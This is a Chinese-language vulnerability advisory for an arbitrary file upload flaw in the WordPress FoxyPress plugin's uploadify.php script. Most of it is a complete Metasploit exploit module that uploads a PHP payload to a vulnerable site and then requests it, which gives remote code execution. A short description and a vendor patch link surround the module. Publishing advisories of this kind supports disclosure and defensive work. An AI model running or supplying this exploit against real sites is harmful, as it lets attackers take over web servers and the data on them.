内容安全 
大数据安全 
网络安全 
更多产品 
WordPress Foxypress插件\'uploadify.php\'任意文件上传漏洞
信息来源:Sammy Forgit 发表日期:2013-05-01 14:59:00
FoxyPress是WordPress博客软件插件。
Foxypress 0.4.1.1-0.4.2.1版本的wp-content/plugins/foxypress/uploadify/uploadify.php脚本允许上传带任意扩展名的文件到webroot内的文件夹,这可导致任意PHP代码执行。
BUGTRAQ-ID:53805
受影响系统:
WordPress FoxyPress 0.4.2.1
测试方法:
警 告以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
require \'msf/core\'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
\'Name\' => \'WordPress plugin Foxypress uploadify.php Arbitrary Code Execution\',
\'Description\' => %q{
This module exploits an arbitrary PHP code execution flaw in the WordPress
blogging software plugin known as Foxypress. The vulnerability allows for arbitrary
file upload and remote code execution via the uploadify.php script. The Foxypress
plug-in versions 0.4.2.1 and below are vulnerable.
},
\'Author\' =>
[
\'Sammy FORGIT\', # Vulnerability Discovery, PoC
\'patrick\' # Metasploit module
],
\'License\' => MSF_LICENSE,
\'Version\' => \'$Revision$\',
\'References\' =>
[
[\'EDB\', \'18991\'],
[\'OSVDB\', \'82652\'],
[\'BID\', \'53805\'],
],
\'Privileged\' => false,
\'Payload\' =>
{
\'Compat\' =>
{
\'ConnectionType\' => \'find\',
},
},
\'Platform\' => \'php\',
\'Arch\' => ARCH_PHP,
\'Targets\' => [[ \'Automatic\', { }]],
\'DisclosureDate\' => \'Jun 05 2012\',
\'DefaultTarget\' => 0))
register_options(
[
OptString.new(\'TARGETURI\', [true, "The full URI path to WordPress", "/"]),
], self.class)
end
def check
uri = target_uri.path
uri << \'/\' if uri[-1,1] != \'/\'
res = send_request_cgi({
\'method\' => \'GET\',
\'uri\' => "#{uri}wp-content/plugins/foxypress/uploadify/uploadify.php"
})
if res and res.code == 200
return Exploit::CheckCode::Detected
else
return Exploit::CheckCode::Safe
end
end
def exploit
uri = target_uri.path
uri << \'/\' if uri[-1,1] != \'/\'
peer = "#{rhost}:#{rport}"
post_data = Rex::MIME::Message.new
post_data.add_part("<?php #{payload.encoded} ?>", "application/octet-stream", nil, "form-data; name=\\"Filedata\\"; filename=\\"#{rand_text_alphanumeric(6)}.php\\"")
print_status("#{peer} - Sending PHP payload")
res = send_request_cgi({
\'method\' => \'POST\',
\'uri\' => "#{uri}wp-content/plugins/foxypress/uploadify/uploadify.php",
\'ctype\' => \'multipart/form-data; boundary=\' + post_data.bound,
\'data\' => post_data.to_s
})
if not res or res.code != 200 or res.body !~ /\\{\\"raw_file_name\\"\\:\\"(\\w+)\\"\\,/
print_error("#{peer} - File wasn\'t uploaded, aborting!")
return
end
print_good("#{peer} - Our payload is at: #{$1}.php! Calling payload...")
res = send_request_cgi({
\'method\' => \'GET\',
\'uri\' => "#{uri}wp-content/affiliate_images/#{$1}.php"
})
if res and res.code != 200
print_error("#{peer} - Server returned #{res.code.to_s}")
end
end
end
解决办法:
厂商补丁:
WordPress
---------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
http://wordpress.org/extend/plugins/foxypress/changelog/
参考信息:
http://osvdb.org/show/osvdb/82652
http://secunia.com/advisories/49382/
